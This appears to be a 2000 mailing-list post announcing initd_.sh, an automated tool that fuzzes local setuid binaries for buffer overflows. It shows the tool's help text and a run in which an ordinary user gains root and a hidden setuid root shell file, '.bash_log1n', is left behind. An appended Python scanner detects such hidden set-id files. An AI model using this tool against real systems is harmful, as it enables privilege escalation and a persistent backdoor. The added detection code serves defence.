New Tool: initd_.sh;
From: "za () boo ma fu" <initd_ () digital net>
Date: Tue, 5 Sep 2000 01:17:15 -0400
/*** Attachment did not send... resending (sorry for the bulk) ***/
I wrote this tool in the last couple of days to see if I could
a program that would automatically attack local binaries and attempt to
in respect to buffer overflows via command line switches.
Despite the script's simplicity I do believe it is a powerful tool
that will aid in securing
any Linux box although I refuse to blindly advertise this as an end all
be all to local
security. As I note in the readme there are numerous discrepancies that
programs strength, however, _most_ (if not all) of these issues will be
upcoming releases of this program.
Instead of explaining the entire process and capability I'll just
paste the --help
output at the end of this message. Also I'll paste an example usage for
This program is a first of its kind as far as I know ;) I'm pretty
excited to see the
response I get from the community.
Portability to as many operating systems as possible will be
however it will take a week or two as I am generating the configurable
myself (something I have never done before at this level).
Anyway, I hope you enjoy this beta release!
initd_ () digital net
0x7F Security Research
Restless eyes and erratic blue flicker
While devilish fingers dance and slither
The sound of electricity, relentless, hums....
....When something wicked this way comes
- initd_'s verse >;)
---- Help Output ----
seychelles.initd_ % ./initd_.sh
Note: For further explanation on switches consult documentation
usage: initd_.sh [options]
-t filename Define the target binary as 'filename'
--min_buffer int Define minimum buffer size as 'int'
--max_buffer int Define maximum buffer size as 'int'
--jmp_buffer int Define buffer increment value as 'int'
--min_offset int Define minimum offset size as 'int'
--max_offset int Define maximum offset size as 'int'
--jmp_offset int Define offset increment value as 'int'
--tmp_dir dir Force all tmp files to be written to 'dir'
--rsd_dir dir Force the RSD directory to be 'dir'
--rsdct_dir dir Force the RSDCT directory to be 'dir'
--et_dir dir Force the ET directory to be 'dir'
--uid int Force user id of target binary to 'int'
--gid int Force group id of target binary to 'int'
-n Do not query program for command line switches
-s switches Pass a quoted string of switches to test
-q Switch messaging to quiet mode
-v Increase program verbocity (3 levels max)
--help | -h Display program usage
Send comments/questions/bugs to: initd_ () digital net
0x7f Security Research Team: Dangerously Deadicated. . .
--- EOHelp ---
phoenix.initd_ % id
uid=1000(initd_) gid=100(users) groups=100(users)
phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex --min_buffer 1024 -v -v -v
# Automated Exploitation Tool v0.0.3
# 0x7f Security Research: Something Wicked This Way Comes...
[+] Target Confirmed
[+] Binary is not stripped
[+] Strip has been located. Exploit stealth has increased
[+] Confirmed temp directory
[+] RSD Directory confirmed
[+] Configuring for a Linux system on a i586 chip
[ ] Owner of target is root
[ ] Group name of target is root
[+] User id # determined to be 0
[+] Group id number determined to be 0
[ ] Creating the Root Shell Dropper
[+] RSD Creation Successful
[ ] Creating Root Shell Dropper Configuration Tool
[+] RSDCT Creation Successful
[ ] Creating Exploitation Tool
[+] ET Creation Succeeded
[ ] Current Switch: -s
[ ] Current Buffer Size: 1024
[ ] Current Offset: -100
[ ] Current Offset: 0
[ ] Current Offset: 100
[ ] Current Offset: 200
[ ] Current Offset: 300
[ ] Current Offset: 400
[+] Executing Cleanup
[+] Cleanup Complete
[ ] Welcome to the Dark Side
uid=0(root) gid=0(root) groups=100(users)
phoenix.initd_ % ls -la
drwxr-xr-x 2 initd_ users 1024 Sep 5 01:05 .
drwxr-xr-x 4 initd_ users 1024 Sep 5 00:31 ..
-rwsr-sr-x 1 root root 3192 Sep 5 01:05 .bash_log1n
-rw-r--r-- 1 initd_ users 9863 Sep 5 00:30 Readme
-rwxr-xr-x 1 initd_ users 21313 Sep 5 00:22 initd_.sh
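
A defender's check for the artifact visible in the listing above (a hidden set-id, root-owned file sitting in a directory owned by an ordinary user), added here as an example; it is not part of the original post or of initd_.sh. The trusted path prefixes and the default scan root are assumptions to adjust per system.

```python
import os
import stat
import sys

# Assumption: set-id binaries are only expected under these system paths.
TRUSTED_PREFIXES = ("/bin/", "/sbin/", "/usr/", "/lib/", "/opt/")


def classify(path, st, dir_uid, trusted=TRUSTED_PREFIXES):
    """Return the reasons a set-id regular file looks dropped (empty list = fine)."""
    if not stat.S_ISREG(st.st_mode):
        return []
    if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
        return []
    reasons = []
    if not os.path.abspath(path).startswith(trusted):
        reasons.append("outside-trusted-path")
    if os.path.basename(path).startswith("."):
        reasons.append("hidden-name")
    if st.st_uid != dir_uid:
        # e.g. a root-owned file inside a directory owned by uid 1000
        reasons.append("owner-differs-from-directory")
    return reasons


def find_suspect_setid(root):
    """Walk root without following symlinks; return (path, mode, reasons) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        try:
            dir_uid = os.lstat(dirpath).st_uid
        except OSError:
            continue  # directory vanished or is unreadable
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished between listing and stat
            reasons = classify(path, st, dir_uid)
            if reasons:
                findings.append((path, stat.filemode(st.st_mode), reasons))
    return findings


if __name__ == "__main__":
    scan_root = sys.argv[1] if len(sys.argv) > 1 else "/home"  # assumed default
    for path, mode, reasons in find_suspect_setid(scan_root):
        print(mode, path, ",".join(reasons))
```

Run it over home, temp and other user-writable trees; a legitimate set-id binary in a system path with a matching directory owner produces no finding.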